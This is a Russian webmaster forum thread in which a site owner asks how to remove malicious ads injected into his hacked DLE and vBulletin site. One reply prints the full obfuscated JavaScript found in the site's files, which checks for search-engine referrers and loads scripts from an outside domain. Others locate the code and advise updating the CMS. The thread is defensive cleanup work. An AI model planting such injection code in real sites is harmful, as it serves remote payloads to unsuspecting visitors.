- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Взломали мой сайт http://lovegelen.ru/ Сайт имеет движок DLE и для форума vBulletin. При заходе с поисковых систем появляется вот такая реклама (и на сайте, и на форуме):
При инспектировании элемента вот что можно узнать:
Если просто посмотреть код страницы, то ничего не найдешь. Элемент как-то вставляется непосредственно до тега </body>.
В шаблонах сайта посмотрел - ничего не нашел. Искал по дате изменения файлов на сервере - тоже безрезультатно.
Подскажите, пожалуйста, как убить эту гадость?
Зашёл на сайт с поисковика и увидел ту же заразу.
Копайте файлы дальше. Ещё один вариант - взломали сам хостинг. Попробуйте хостеру написать.
Зашёл на сайт с поисковика и увидел ту же заразу.
Копайте файлы дальше. Ещё один вариант - взломали сам хостинг. Попробуйте хостеру написать.
Написал хостеру - ничего не нашли.
aibolit ом проверяли?
aibolit ом проверяли?
пока не проверял. Сейчас установлю
Woland1982, Проверяйте:
var regV = '/ya\.|yandex\.|google\.|mail\.|rambler\.|vk./';
var ref = document.referrer;
var result = ref.match(regV);
if (result) {
function P3wRn9(n){ var suzRqS = 'abcdefghijklmnopqrstuvwxyz'; var iVec = suzRqS.charAt(Math.floor(Math.random() * suzRqS.length)); while(iVec.length < n) iVec += Math.random().toString(36).slice(2, 12); return iVec.substr(0, n);}
var HkF71iU = P3wRn9(6);
var z5H7SJu6UFcR = document.createElement('script');z5H7SJu6UFcR.src = 'http://www.rt-ns.ru/'+HkF71iU+'.php?id=11303&mb_s=1&f=m';z5H7SJu6UFcR.type = "text/javascript";document.getElementsByTagName('head')[0].appendChild( z5H7SJu6UFcR );function IppRK2DLfW81(){if(window.beSu===undefined){setTimeout(IppRK2DLfW81,1e3);return}for(i=0;i<xzArr.length;i++){var a=document.createElement("script");a.src="http://www."+qwDo+"/"+plFo+"/"+xzArr+".php?id="+kfId+"&mb_s="+nlMs;a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a)}}IppRK2DLfW81()
}
эта фигня находится в js-файлах, скорее всего в библиотеках мутулса.
Искать только регулярными выражениями, используя кусочки домена в ифрейме или сам iframe.
Проверь http://lovegelen.ru/engine/classes/js/jquery.js
http://lovegelen.ru/engine/classes/js/jqueryui.js
По крайней мере, там я находил, когда такое случалось на сайте напарника.
tls, все верно написал, хрень находится в конце файла www.lovegelen.ru/engine/classes/js/dle_js.js (41-47 строки), только вот через какую дыру dle она туда попала и как ее закрыть вопрос открытый, но это лучше всего обновиться до последней версии и убедиться, что не остались backdoor-ы
DLE - Это одна сплошная дыра...
Смотрите логи, там будет видно куда копать
Woland1982, Проверяйте: /engine/classes/js/dle_js.js
Еще: /forum/clientscript/yui/connection/connection-min.js
И конечно надо искать через что залили.
Спасибо, tls, все верно. Эта гадость там, где Вы писали, и располагалась. Теперь буду искать через что залили.